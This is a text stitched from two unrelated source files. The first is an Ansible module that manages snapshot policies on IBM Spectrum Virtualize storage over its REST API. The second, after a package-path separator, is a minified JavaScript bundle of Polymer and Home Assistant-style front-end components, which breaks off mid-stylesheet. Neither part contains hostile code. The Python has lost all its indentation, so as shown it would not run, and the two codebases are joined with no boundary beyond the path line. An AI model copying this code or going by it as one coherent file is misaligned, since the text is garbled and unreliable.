DOCUMENTATION = '''
---
module: ibm_sv_manage_snapshotpolicy
short_description: This module manages snapshot policy configuration on IBM Spectrum Virtualize family storage systems
version_added: "1.9.0"
description:
- Ansible interface to manage 'mksnapshotpolicy' and 'rmsnapshotpolicy' snapshot policy commands.
- Snapshot policy is introduced in IBM Spectrum Virtualize 8.5.1.0.
options:
clustername:
description:
- The hostname or management IP of the Spectrum Virtualize storage system.
required: true
type: str
domain:
description:
- Domain for the Spectrum Virtualize storage system.
- Valid when hostname is used for the parameter I(clustername).
type: str
username:
description:
- REST API username for the Spectrum Virtualize storage system.
- The parameters I(username) and I(password) are required if not using I(token) to authenticate a user.
type: str
password:
description:
- REST API password for the Spectrum Virtualize storage system.
- The parameters I(username) and I(password) are required if not using I(token) to authenticate a user.
type: str
token:
description:
- The authentication token to verify a user on the Spectrum Virtualize storage system.
- To generate a token, use the M(ibm.spectrum_virtualize.ibm_svc_auth) module.
type: str
log_path:
description:
- Path of debug log file.
type: str
state:
description:
- Creates (C(present)) or deletes (C(absent)) a snapshot policy.
- Resume (C(resume)) or suspend (C(suspend)) the snapshot policy, system-wide.
choices: [ present, absent, suspend, resume ]
required: true
type: str
name:
description:
- Specifies a unique name of the snapshot policy.
- Not applicable when I(state=suspend) or I(state=resume).
type: str
backupunit:
description:
- Specifies the backup unit in mentioned metric.
- Applies when I(state=present).
choices: [ minute, hour, day, week, month ]
type: str
backupinterval:
description:
- Specifies the backup interval.
- Applies when I(state=present).
type: str
backupstarttime:
description:
- Specifies the start time of backup in the format YYMMDDHHMM.
- Applies when I(state=present).
type: str
retentiondays:
description:
- Specifies the retention days for the backup.
- Applies when I(state=present).
type: str
removefromvolumegroups:
description:
- Specify to remove the volume group association from the snapshot policy.
- Applies when I(state=absent).
- This option is allowed only for SecurityAdmin users.
type: bool
validate_certs:
description:
- Validates certification.
default: false
type: bool
author:
- Shilpi Jain(@Shilpi-J)
notes:
- This module supports C(check_mode).
'''
EXAMPLES = '''
- name: Create snapshot policy
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
name: policy0
backupunit: day
backupinterval: 1
backupstarttime: 2102281800
retentiondays: 15
state: present
- name: Suspend snapshot policy functionality
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
state: suspend
- name: Resume snapshot policy functionality
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
state: resume
- name: Delete snapshot policy
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
name: policy0
state: absent
'''
RETURN = '''#'''
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.ibm.spectrum_virtualize.plugins.module_utils.ibm_svc_utils import (
IBMSVCRestApi, svc_argument_spec,
get_logger
)
from ansible.module_utils._text import to_native
class IBMSVCSnapshotPolicy:
def __init__(self):
argument_spec = svc_argument_spec()
argument_spec.update(
dict(
state=dict(
type='str',
required=True,
choices=['present', 'absent', 'suspend', 'resume']
),
name=dict(
type='str',
),
backupunit=dict(
type='str',
choices=['minute', 'hour', 'day', 'week', 'month'],
),
backupinterval=dict(
type='str',
),
backupstarttime=dict(
type='str',
),
retentiondays=dict(
type='str',
),
removefromvolumegroups=dict(
type='bool'
),
)
)
self.module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
# Required parameters
self.name = self.module.params['name']
self.state = self.module.params['state']
self.backupunit = self.module.params.get('backupunit', '')
self.backupinterval = self.module.params.get('backupinterval', '')
self.backupstarttime = self.module.params.get('backupstarttime', '')
self.retentiondays = self.module.params.get('retentiondays', '')
self.removefromvolumegroups = self.module.params.get('removefromvolumegroups', False)
self.basic_checks()
# Variable to cache data
self.snapshot_policy_details = None
# logging setup
self.log_path = self.module.params['log_path']
log = get_logger(self.__class__.__name__, self.log_path)
self.log = log.info
self.changed = False
self.msg = ''
self.restapi = IBMSVCRestApi(
module=self.module,
clustername=self.module.params['clustername'],
domain=self.module.params['domain'],
username=self.module.params['username'],
password=self.module.params['password'],
validate_certs=self.module.params['validate_certs'],
log_path=self.log_path,
token=self.module.params['token']
)
def basic_checks(self):
if self.state == 'present':
fields = ['name', 'backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: not getattr(self, x), fields))
if any(exists):
self.module.fail_json(
msg="State is present but following parameters are missing: {0}".format(', '.join(exists))
)
if self.removefromvolumegroups:
self.module.fail_json(
msg="`removefromvolumegroups` parameter is not supported when state=present"
)
elif self.state == 'absent':
if not self.name:
self.module.fail_json(msg="Missing mandatory parameter: name")
fields = ['backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: getattr(self, x) or getattr(self, x) == '', fields))
if any(exists):
self.module.fail_json(msg='{0} should not be passed when state=absent'.format(', '.join(exists)))
elif self.state in ['suspend', 'resume']:
fields = ['name', 'backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: getattr(self, x) or getattr(self, x) == '', fields))
if any(exists):
self.module.fail_json(msg='{0} should not be passed when state={1}'.format(', '.join(exists), self.state))
def policy_exists(self):
merged_result = {}
data = self.restapi.svc_obj_info(
cmd='lssnapshotschedule',
cmdopts=None,
cmdargs=[self.name]
)
if isinstance(data, list):
for d in data:
merged_result.update(d)
else:
merged_result = data
self.snapshot_policy_details = merged_result
return merged_result
def create_snapshot_policy(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'mksnapshotpolicy'
cmdopts = {
'name': self.name,
'backupstarttime': self.backupstarttime,
'backupinterval': self.backupinterval,
'backupunit': self.backupunit,
'retentiondays': self.retentiondays
}
self.restapi.svc_run_command(cmd, cmdopts, cmdargs=None)
self.log('Snapshot policy (%s) created', self.name)
self.changed = True
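    # Compares the requested schedule fields with the existing policy; a True entry in
    # the returned list means that field differs from what is configured on the system.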
def snapshot_policy_probe(self):
field_mappings = (
('backupinterval', self.snapshot_policy_details['backup_interval']),
('backupstarttime', self.snapshot_policy_details['backup_start_time']),
('retentiondays', self.snapshot_policy_details['retention_days']),
('backupunit', self.snapshot_policy_details['backup_unit'])
)
updates = []
for field, existing_value in field_mappings:
if field == 'backupstarttime':
updates.append(existing_value != '{0}00'.format(getattr(self, field)))
else:
updates.append(existing_value != getattr(self, field))
return updates
def delete_snapshot_policy(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'rmsnapshotpolicy'
cmdargs = [self.name]
cmdopts = None
if self.removefromvolumegroups:
cmdopts = {
'removefromvolumegroups': True
}
self.restapi.svc_run_command(cmd, cmdopts=cmdopts, cmdargs=cmdargs)
self.log('Snapshot policy (%s) deleted', self.name)
self.changed = True
def update_snapshot_scheduler(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'chsystem'
cmdopts = {'snapshotpolicysuspended': 'yes' if self.state == 'suspend' else 'no'}
self.restapi.svc_run_command(cmd, cmdopts=cmdopts, cmdargs=None)
self.log('Snapshot scheduler status changed: %s', self.state)
self.changed = True
def apply(self):
if self.state in ['resume', 'suspend']:
self.update_snapshot_scheduler()
self.msg = 'Snapshot scheduler {0}ed'.format(self.state.rstrip('e'))
else:
if self.policy_exists():
if self.state == 'present':
modifications = self.snapshot_policy_probe()
if any(modifications):
                        self.msg = 'Policy modification is not supported in Ansible. Please delete and recreate the policy.'
else:
self.msg = 'Snapshot policy ({0}) already exists. No modifications done.'.format(self.name)
else:
self.delete_snapshot_policy()
self.msg = 'Snapshot policy ({0}) deleted.'.format(self.name)
else:
if self.state == 'absent':
self.msg = 'Snapshot policy ({0}) does not exist. No modifications done.'.format(self.name)
else:
self.create_snapshot_policy()
self.msg = 'Snapshot policy ({0}) created.'.format(self.name)
if self.module.check_mode:
self.msg = 'skipping changes due to check mode.'
self.module.exit_json(
changed=self.changed,
msg=self.msg
)
def main():
v = IBMSVCSnapshotPolicy()
try:
v.apply()
except Exception as e:
v.log("Exception in apply(): \n%s", format_exc())
v.module.fail_json(msg="Module failed. Error [%s]." % to_native(e))
if __name__ == '__main__':
main() | PypiClean |
/vais-frontend-20220519051104.tar.gz/vais-frontend-20220519051104/vais_frontend/c.ed246a19.js | import{aD as t,a7 as e,aE as i,aF as o,aG as s,Q as n,S as a,aH as r,aI as l,aJ as d,a as c,f as h,e as p,$ as u,r as f,n as g,o as v,m as y,aK as m,af as _,aL as b,c as w,aM as k,aN as x,aO as z,d as T}from"./main-e088bb19.js";import{i as S}from"./c.4cc25ce4.js";import{a as R}from"./c.166c4b5c.js";import"./c.e9faf9fb.js";import{c as E,I as C}from"./c.06c5e585.js";import"./c.ceb1e431.js";import{b as $}from"./c.fcc8c8a6.js";import{s as L}from"./c.6d4d84f1.js";import"./c.73230ac7.js";import"./c.743a15a1.js";import"./c.3c6412dd.js";import"./c.d8002660.js";var D=new Set;const H=[{properties:{_parentResizable:{type:Object,observer:"_parentResizableChanged"},_notifyingDescendant:{type:Boolean,value:!1}},listeners:{"iron-request-resize-notifications":"_onIronRequestResizeNotifications"},created:function(){this._interestedResizables=[],this._boundNotifyResize=this.notifyResize.bind(this),this._boundOnDescendantIronResize=this._onDescendantIronResize.bind(this)},attached:function(){this._requestResizeNotifications()},detached:function(){this._parentResizable?this._parentResizable.stopResizeNotificationsFor(this):(D.delete(this),window.removeEventListener("resize",this._boundNotifyResize)),this._parentResizable=null},notifyResize:function(){this.isAttached&&(this._interestedResizables.forEach((function(t){this.resizerShouldNotify(t)&&this._notifyDescendant(t)}),this),this._fireResize())},assignParentResizable:function(t){this._parentResizable&&this._parentResizable.stopResizeNotificationsFor(this),this._parentResizable=t,t&&-1===t._interestedResizables.indexOf(this)&&(t._interestedResizables.push(this),t._subscribeIronResize(this))},stopResizeNotificationsFor:function(t){var e=this._interestedResizables.indexOf(t);e>-1&&(this._interestedResizables.splice(e,1),this._unsubscribeIronResize(t))},_subscribeIronResize:function(t){t.addEventListener("iron-resize",this._boundOnDescendantIronResize)},_unsubscribeIronResize:function(t){t.removeEventListener("iron-resize",this._boundOnDescendantIronResize)},resizerShouldNotify:function(t){return!0},_onDescendantIronResize:function(e){this._notifyingDescendant?e.stopPropagation():t||this._fireResize()},_fireResize:function(){this.fire("iron-resize",null,{node:this,bubbles:!1})},_onIronRequestResizeNotifications:function(t){var i=e(t).rootTarget;i!==this&&(i.assignParentResizable(this),this._notifyDescendant(i),t.stopPropagation())},_parentResizableChanged:function(t){t&&window.removeEventListener("resize",this._boundNotifyResize)},_notifyDescendant:function(t){this.isAttached&&(this._notifyingDescendant=!0,t.notifyResize(),this._notifyingDescendant=!1)},_requestResizeNotifications:function(){if(this.isAttached)if("loading"===document.readyState){var t=this._requestResizeNotifications.bind(this);document.addEventListener("readystatechange",(function e(){document.removeEventListener("readystatechange",e),t()}))}else 
this._findParent(),this._parentResizable?this._parentResizable._interestedResizables.forEach((function(t){t!==this&&t._findParent()}),this):(D.forEach((function(t){t!==this&&t._findParent()}),this),window.addEventListener("resize",this._boundNotifyResize),this.notifyResize())},_findParent:function(){this.assignParentResizable(null),this.fire("iron-request-resize-notifications",null,{node:this,bubbles:!0,cancelable:!0}),this._parentResizable?D.delete(this):D.add(this)}},{listeners:{"app-reset-layout":"_appResetLayoutHandler","iron-resize":"resetLayout"},attached:function(){this.fire("app-reset-layout")},_appResetLayoutHandler:function(t){e(t).path[0]!==this&&(this.resetLayout(),t.stopPropagation())},_updateLayoutStates:function(){console.error("unimplemented")},resetLayout:function(){var t=this._updateLayoutStates.bind(this);this._layoutDebouncer=i.debounce(this._layoutDebouncer,o,t),s(this._layoutDebouncer),this._notifyDescendantResize()},_notifyLayoutChanged:function(){var t=this;requestAnimationFrame((function(){t.fire("app-reset-layout")}))},_notifyDescendantResize:function(){this.isAttached&&this._interestedResizables.forEach((function(t){this.resizerShouldNotify(t)&&this._notifyDescendant(t)}),this)}}],F={properties:{scrollTarget:{type:HTMLElement,value:function(){return this._defaultScrollTarget}}},observers:["_scrollTargetChanged(scrollTarget, isAttached)"],_shouldHaveListener:!0,_scrollTargetChanged:function(t,i){if(this._oldScrollTarget&&(this._toggleScrollListener(!1,this._oldScrollTarget),this._oldScrollTarget=null),i)if("document"===t)this.scrollTarget=this._doc;else if("string"==typeof t){var o=this.domHost;this.scrollTarget=o&&o.$?o.$[t]:e(this.ownerDocument).querySelector("#"+t)}else this._isValidScrollTarget()&&(this._oldScrollTarget=t,this._toggleScrollListener(this._shouldHaveListener,t))},_scrollHandler:function(){},get _defaultScrollTarget(){return this._doc},get _doc(){return this.ownerDocument.documentElement},get _scrollTop(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageYOffset:this.scrollTarget.scrollTop:0},get _scrollLeft(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageXOffset:this.scrollTarget.scrollLeft:0},set _scrollTop(t){this.scrollTarget===this._doc?window.scrollTo(window.pageXOffset,t):this._isValidScrollTarget()&&(this.scrollTarget.scrollTop=t)},set _scrollLeft(t){this.scrollTarget===this._doc?window.scrollTo(t,window.pageYOffset):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=t)},scroll:function(t,e){var i;"object"==typeof t?(i=t.left,e=t.top):i=t,i=i||0,e=e||0,this.scrollTarget===this._doc?window.scrollTo(i,e):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=i,this.scrollTarget.scrollTop=e)},get _scrollTargetWidth(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerWidth:this.scrollTarget.offsetWidth:0},get _scrollTargetHeight(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerHeight:this.scrollTarget.offsetHeight:0},_isValidScrollTarget:function(){return this.scrollTarget instanceof HTMLElement},_toggleScrollListener:function(t,e){var 
i=e===this._doc?window:e;t?this._boundScrollHandler||(this._boundScrollHandler=this._scrollHandler.bind(this),i.addEventListener("scroll",this._boundScrollHandler)):this._boundScrollHandler&&(i.removeEventListener("scroll",this._boundScrollHandler),this._boundScrollHandler=null)},toggleScrollListener:function(t){this._shouldHaveListener=t,this._toggleScrollListener(t,this.scrollTarget)}},A={},M=[F,{properties:{effects:{type:String},effectsConfig:{type:Object,value:function(){return{}}},disabled:{type:Boolean,reflectToAttribute:!0,value:!1},threshold:{type:Number,value:0},thresholdTriggered:{type:Boolean,notify:!0,readOnly:!0,reflectToAttribute:!0}},observers:["_effectsChanged(effects, effectsConfig, isAttached)"],_updateScrollState:function(t){},isOnScreen:function(){return!1},isContentBelow:function(){return!1},_effectsRunFn:null,_effects:null,get _clampedScrollTop(){return Math.max(0,this._scrollTop)},attached:function(){this._scrollStateChanged()},detached:function(){this._tearDownEffects()},createEffect:function(t,e){var i=A[t];if(!i)throw new ReferenceError(this._getUndefinedMsg(t));var o=this._boundEffect(i,e||{});return o.setUp(),o},_effectsChanged:function(t,e,i){this._tearDownEffects(),t&&i&&(t.split(" ").forEach((function(t){var i;""!==t&&((i=A[t])?this._effects.push(this._boundEffect(i,e[t])):console.warn(this._getUndefinedMsg(t)))}),this),this._setUpEffect())},_layoutIfDirty:function(){return this.offsetWidth},_boundEffect:function(t,e){e=e||{};var i=parseFloat(e.startsAt||0),o=parseFloat(e.endsAt||1),s=o-i,n=function(){},a=0===i&&1===o?t.run:function(e,o){t.run.call(this,Math.max(0,(e-i)/s),o)};return{setUp:t.setUp?t.setUp.bind(this,e):n,run:t.run?a.bind(this):n,tearDown:t.tearDown?t.tearDown.bind(this):n}},_setUpEffect:function(){this.isAttached&&this._effects&&(this._effectsRunFn=[],this._effects.forEach((function(t){!1!==t.setUp()&&this._effectsRunFn.push(t.run)}),this))},_tearDownEffects:function(){this._effects&&this._effects.forEach((function(t){t.tearDown()})),this._effectsRunFn=[],this._effects=[]},_runEffects:function(t,e){this._effectsRunFn&&this._effectsRunFn.forEach((function(i){i(t,e)}))},_scrollHandler:function(){this._scrollStateChanged()},_scrollStateChanged:function(){if(!this.disabled){var t=this._clampedScrollTop;this._updateScrollState(t),this.threshold>0&&this._setThresholdTriggered(t>=this.threshold)}},_getDOMRef:function(t){console.warn("_getDOMRef","`"+t+"` is undefined")},_getUndefinedMsg:function(t){return"Scroll effect `"+t+"` is undefined. Did you forget to import app-layout/app-scroll-effects/effects/"+t+".html ?"}}];n({_template:a`
<style>
:host {
position: relative;
display: block;
transition-timing-function: linear;
transition-property: -webkit-transform;
transition-property: transform;
}
:host::before {
position: absolute;
right: 0px;
bottom: -5px;
left: 0px;
width: 100%;
height: 5px;
content: "";
transition: opacity 0.4s;
pointer-events: none;
opacity: 0;
box-shadow: inset 0px 5px 6px -3px rgba(0, 0, 0, 0.4);
will-change: opacity;
@apply --app-header-shadow;
}
:host([shadow])::before {
opacity: 1;
}
#background {
@apply --layout-fit;
overflow: hidden;
}
#backgroundFrontLayer,
#backgroundRearLayer {
@apply --layout-fit;
height: 100%;
pointer-events: none;
background-size: cover;
}
#backgroundFrontLayer {
@apply --app-header-background-front-layer;
}
#backgroundRearLayer {
opacity: 0;
@apply --app-header-background-rear-layer;
}
#contentContainer {
position: relative;
width: 100%;
height: 100%;
}
:host([disabled]),
:host([disabled])::after,
:host([disabled]) #backgroundFrontLayer,
:host([disabled]) #backgroundRearLayer,
/* Silent scrolling should not run CSS transitions */
:host([silent-scroll]),
:host([silent-scroll])::after,
:host([silent-scroll]) #backgroundFrontLayer,
:host([silent-scroll]) #backgroundRearLayer {
transition: none !important;
}
:host([disabled]) ::slotted(app-toolbar:first-of-type),
:host([disabled]) ::slotted([sticky]),
/* Silent scrolling should not run CSS transitions */
:host([silent-scroll]) ::slotted(app-toolbar:first-of-type),
:host([silent-scroll]) ::slotted([sticky]) {
transition: none !important;
}
</style>
<div id="contentContainer">
<slot id="slot"></slot>
</div>
`,is:"app-header",behaviors:[M,H],properties:{condenses:{type:Boolean,value:!1},fixed:{type:Boolean,value:!1},reveals:{type:Boolean,value:!1},shadow:{type:Boolean,reflectToAttribute:!0,value:!1}},observers:["_configChanged(isAttached, condenses, fixed)"],_height:0,_dHeight:0,_stickyElTop:0,_stickyElRef:null,_top:0,_progress:0,_wasScrollingDown:!1,_initScrollTop:0,_initTimestamp:0,_lastTimestamp:0,_lastScrollTop:0,get _maxHeaderTop(){return this.fixed?this._dHeight:this._height+5},get _stickyEl(){if(this._stickyElRef)return this._stickyElRef;for(var t,i=e(this.$.slot).getDistributedNodes(),o=0;t=i[o];o++)if(t.nodeType===Node.ELEMENT_NODE){if(t.hasAttribute("sticky")){this._stickyElRef=t;break}this._stickyElRef||(this._stickyElRef=t)}return this._stickyElRef},_configChanged:function(){this.resetLayout(),this._notifyLayoutChanged()},_updateLayoutStates:function(){if(0!==this.offsetWidth||0!==this.offsetHeight){var t=this._clampedScrollTop,e=0===this._height||0===t,i=this.disabled;this._height=this.offsetHeight,this._stickyElRef=null,this.disabled=!0,e||this._updateScrollState(0,!0),this._mayMove()?this._dHeight=this._stickyEl?this._height-this._stickyEl.offsetHeight:0:this._dHeight=0,this._stickyElTop=this._stickyEl?this._stickyEl.offsetTop:0,this._setUpEffect(),e?this._updateScrollState(t,!0):(this._updateScrollState(this._lastScrollTop,!0),this._layoutIfDirty()),this.disabled=i}},_updateScrollState:function(t,e){if(0!==this._height){var i=0,o=0,s=this._top;this._lastScrollTop;var n=this._maxHeaderTop,a=t-this._lastScrollTop,r=Math.abs(a),l=t>this._lastScrollTop,d=performance.now();if(this._mayMove()&&(o=this._clamp(this.reveals?s+a:t,0,n)),t>=this._dHeight&&(o=this.condenses&&!this.fixed?Math.max(this._dHeight,o):o,this.style.transitionDuration="0ms"),this.reveals&&!this.disabled&&r<100&&((d-this._initTimestamp>300||this._wasScrollingDown!==l)&&(this._initScrollTop=t,this._initTimestamp=d),t>=n))if(Math.abs(this._initScrollTop-t)>30||r>10){l&&t>=n?o=n:!l&&t>=this._dHeight&&(o=this.condenses&&!this.fixed?this._dHeight:0);var c=a/(d-this._lastTimestamp);this.style.transitionDuration=this._clamp((o-s)/c,0,300)+"ms"}else o=this._top;i=0===this._dHeight?t>0?1:0:o/this._dHeight,e||(this._lastScrollTop=t,this._top=o,this._wasScrollingDown=l,this._lastTimestamp=d),(e||i!==this._progress||s!==o||0===t)&&(this._progress=i,this._runEffects(i,o),this._transformHeader(o))}},_mayMove:function(){return this.condenses||!this.fixed},willCondense:function(){return this._dHeight>0&&this.condenses},isOnScreen:function(){return 0!==this._height&&this._top<this._height},isContentBelow:function(){return 0===this._top?this._clampedScrollTop>0:this._clampedScrollTop-this._maxHeaderTop>=0},_transformHeader:function(t){this.translate3d(0,-t+"px",0),this._stickyEl&&this.translate3d(0,this.condenses&&t>=this._stickyElTop?Math.min(t,this._dHeight)-this._stickyElTop+"px":0,0,this._stickyEl)},_clamp:function(t,e,i){return Math.min(i,Math.max(e,t))},_ensureBgContainers:function(){this._bgContainer||(this._bgContainer=document.createElement("div"),this._bgContainer.id="background",this._bgRear=document.createElement("div"),this._bgRear.id="backgroundRearLayer",this._bgContainer.appendChild(this._bgRear),this._bgFront=document.createElement("div"),this._bgFront.id="backgroundFrontLayer",this._bgContainer.appendChild(this._bgFront),e(this.root).insertBefore(this._bgContainer,this.$.contentContainer))},_getDOMRef:function(t){switch(t){case"backgroundFrontLayer":return 
this._ensureBgContainers(),this._bgFront;case"backgroundRearLayer":return this._ensureBgContainers(),this._bgRear;case"background":return this._ensureBgContainers(),this._bgContainer;case"mainTitle":return e(this).querySelector("[main-title]");case"condensedTitle":return e(this).querySelector("[condensed-title]")}return null},getScrollState:function(){return{progress:this._progress,top:this._top}}}),n({_template:a`
<style>
:host {
display: block;
/**
* Force app-header-layout to have its own stacking context so that its parent can
* control the stacking of it relative to other elements (e.g. app-drawer-layout).
* This could be done using \`isolation: isolate\`, but that's not well supported
* across browsers.
*/
position: relative;
z-index: 0;
}
#wrapper ::slotted([slot=header]) {
@apply --layout-fixed-top;
z-index: 1;
}
#wrapper.initializing ::slotted([slot=header]) {
position: relative;
}
:host([has-scrolling-region]) {
height: 100%;
}
:host([has-scrolling-region]) #wrapper ::slotted([slot=header]) {
position: absolute;
}
:host([has-scrolling-region]) #wrapper.initializing ::slotted([slot=header]) {
position: relative;
}
:host([has-scrolling-region]) #wrapper #contentContainer {
@apply --layout-fit;
overflow-y: auto;
-webkit-overflow-scrolling: touch;
}
:host([has-scrolling-region]) #wrapper.initializing #contentContainer {
position: relative;
}
:host([fullbleed]) {
@apply --layout-vertical;
@apply --layout-fit;
}
:host([fullbleed]) #wrapper,
:host([fullbleed]) #wrapper #contentContainer {
@apply --layout-vertical;
@apply --layout-flex;
}
#contentContainer {
/* Create a stacking context here so that all children appear below the header. */
position: relative;
z-index: 0;
}
@media print {
:host([has-scrolling-region]) #wrapper #contentContainer {
overflow-y: visible;
}
}
</style>
<div id="wrapper" class="initializing">
<slot id="headerSlot" name="header"></slot>
<div id="contentContainer">
<slot></slot>
</div>
</div>
`,is:"app-header-layout",behaviors:[H],properties:{hasScrollingRegion:{type:Boolean,value:!1,reflectToAttribute:!0}},observers:["resetLayout(isAttached, hasScrollingRegion)"],get header(){return e(this.$.headerSlot).getDistributedNodes()[0]},_updateLayoutStates:function(){var t=this.header;if(this.isAttached&&t){this.$.wrapper.classList.remove("initializing"),t.scrollTarget=this.hasScrollingRegion?this.$.contentContainer:this.ownerDocument.documentElement;var e=t.offsetHeight;this.hasScrollingRegion?(t.style.left="",t.style.right=""):requestAnimationFrame(function(){var e=this.getBoundingClientRect(),i=document.documentElement.clientWidth-e.right;t.style.left=e.left+"px",t.style.right=i+"px"}.bind(this));var i=this.$.contentContainer.style;t.fixed&&!t.condenses&&this.hasScrollingRegion?(i.marginTop=e+"px",i.paddingTop=""):(i.paddingTop=e+"px",i.marginTop="")}}});class N extends(customElements.get("app-header-layout")){static get template(){return a`
<style>
:host {
display: block;
/**
* Force app-header-layout to have its own stacking context so that its parent can
* control the stacking of it relative to other elements (e.g. app-drawer-layout).
* This could be done using \`isolation: isolate\`, but that's not well supported
* across browsers.
*/
position: relative;
z-index: 0;
}
#wrapper ::slotted([slot="header"]) {
@apply --layout-fixed-top;
z-index: 1;
}
#wrapper.initializing ::slotted([slot="header"]) {
position: relative;
}
:host([has-scrolling-region]) {
height: 100%;
}
:host([has-scrolling-region]) #wrapper ::slotted([slot="header"]) {
position: absolute;
}
:host([has-scrolling-region])
#wrapper.initializing
::slotted([slot="header"]) {
position: relative;
}
:host([has-scrolling-region]) #wrapper #contentContainer {
@apply --layout-fit;
overflow-y: auto;
-webkit-overflow-scrolling: touch;
}
:host([has-scrolling-region]) #wrapper.initializing #contentContainer {
position: relative;
}
#contentContainer {
/* Create a stacking context here so that all children appear below the header. */
position: relative;
z-index: 0;
/* Using 'transform' will cause 'position: fixed' elements to behave like
'position: absolute' relative to this element. */
transform: translate(0);
margin-left: env(safe-area-inset-left);
margin-right: env(safe-area-inset-right);
}
@media print {
:host([has-scrolling-region]) #wrapper #contentContainer {
overflow-y: visible;
}
}
</style>
<div id="wrapper" class="initializing">
<slot id="headerSlot" name="header"></slot>
<div id="contentContainer"><slot></slot></div>
<slot id="fab" name="fab"></slot>
</div>
`}}customElements.define("ha-app-layout",N);const B=document.createElement("template");B.setAttribute("style","display: none;"),B.innerHTML="<dom-module id=\"paper-item-shared-styles\">\n <template>\n <style>\n :host, .paper-item {\n display: block;\n position: relative;\n min-height: var(--paper-item-min-height, 48px);\n padding: 0px 16px;\n }\n\n .paper-item {\n @apply --paper-font-subhead;\n border:none;\n outline: none;\n background: white;\n width: 100%;\n text-align: left;\n }\n\n :host([hidden]), .paper-item[hidden] {\n display: none !important;\n }\n\n :host(.iron-selected), .paper-item.iron-selected {\n font-weight: var(--paper-item-selected-weight, bold);\n\n @apply --paper-item-selected;\n }\n\n :host([disabled]), .paper-item[disabled] {\n color: var(--paper-item-disabled-color, var(--disabled-text-color));\n\n @apply --paper-item-disabled;\n }\n\n :host(:focus), .paper-item:focus {\n position: relative;\n outline: 0;\n\n @apply --paper-item-focused;\n }\n\n :host(:focus):before, .paper-item:focus:before {\n @apply --layout-fit;\n\n background: currentColor;\n content: '';\n opacity: var(--dark-divider-opacity);\n pointer-events: none;\n\n @apply --paper-item-focused-before;\n }\n </style>\n </template>\n</dom-module>",document.head.appendChild(B.content);n({_template:a`
<style include="paper-item-shared-styles"></style>
<style>
:host {
@apply --layout-horizontal;
@apply --layout-center;
@apply --paper-font-subhead;
@apply --paper-item;
@apply --paper-icon-item;
}
.content-icon {
@apply --layout-horizontal;
@apply --layout-center;
width: var(--paper-item-icon-width, 56px);
@apply --paper-item-icon;
}
</style>
<div id="contentIcon" class="content-icon">
<slot name="item-icon"></slot>
</div>
<slot></slot>
`,is:"paper-icon-item",behaviors:[[E,C,{hostAttributes:{role:"option",tabindex:"0"}}]]});const I=(t,e)=>e.component?S(t,e.component):!e.components||e.components.some((e=>S(t,e))),O=t=>t.core,W=(t,e)=>(t=>t.advancedOnly)(e)&&!(t=>{var e;return null===(e=t.userData)||void 0===e?void 0:e.showAdvanced})(t);customElements.define("ha-icon-next",class extends r{connectedCallback(){super.connectedCallback(),setTimeout((()=>{this.path="ltr"===window.getComputedStyle(this).direction?l:d}),100)}}),c([g("ha-config-navigation")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p({attribute:!1})],key:"hass",value:void 0},{kind:"field",decorators:[p({type:Boolean})],key:"narrow",value:void 0},{kind:"field",decorators:[p()],key:"showAdvanced",value:void 0},{kind:"field",decorators:[p()],key:"pages",value:void 0},{kind:"method",key:"render",value:function(){return u`
${this.pages.map((t=>{var e;return("#external-app-configuration"===t.path?null===(e=this.hass.auth.external)||void 0===e?void 0:e.config.hasSettingsScreen:((t,e)=>(O(e)||I(t,e))&&!W(t,e))(this.hass,t))?u`
<a href=${t.path} role="option" tabindex="-1">
<paper-icon-item @click=${this._entryClicked}>
<div
class=${t.iconColor?"icon-background":""}
slot="item-icon"
.style="background-color: ${t.iconColor||"undefined"}"
>
<ha-svg-icon .path=${t.iconPath}></ha-svg-icon>
</div>
<paper-item-body two-line>
${t.name||this.hass.localize(`ui.panel.config.dashboard.${t.translationKey}.title`)}
${"cloud"===t.component&&t.info?t.info.logged_in?u`
<div secondary>
${this.hass.localize("ui.panel.config.cloud.description_login","email",t.info.email)}
</div>
`:u`
<div secondary>
${this.hass.localize("ui.panel.config.cloud.description_features")}
</div>
`:u`
<div secondary>
${t.description||this.hass.localize(`ui.panel.config.dashboard.${t.translationKey}.description`)}
</div>
`}
</paper-item-body>
${this.narrow?"":u`<ha-icon-next></ha-icon-next>`}
</paper-icon-item>
</a>
`:""}))}
`}},{kind:"method",key:"_entryClicked",value:function(t){t.currentTarget.blur(),t.currentTarget.parentElement.href.endsWith("#external-app-configuration")&&(t.preventDefault(),this.hass.auth.external.fireMessage({type:"config_screen/show"}))}},{kind:"get",static:!0,key:"styles",value:function(){return f`
a {
text-decoration: none;
color: var(--primary-text-color);
position: relative;
display: block;
outline: 0;
}
ha-svg-icon,
ha-icon-next {
color: var(--secondary-text-color);
height: 24px;
width: 24px;
}
ha-svg-icon {
padding: 8px;
}
.iron-selected paper-item::before,
a:not(.iron-selected):focus::before {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
pointer-events: none;
content: "";
transition: opacity 15ms linear;
will-change: opacity;
}
a:not(.iron-selected):focus::before {
background-color: currentColor;
opacity: var(--dark-divider-opacity);
}
.iron-selected paper-item:focus::before,
.iron-selected:focus paper-item::before {
opacity: 0.2;
}
.icon-background {
border-radius: 20%;
}
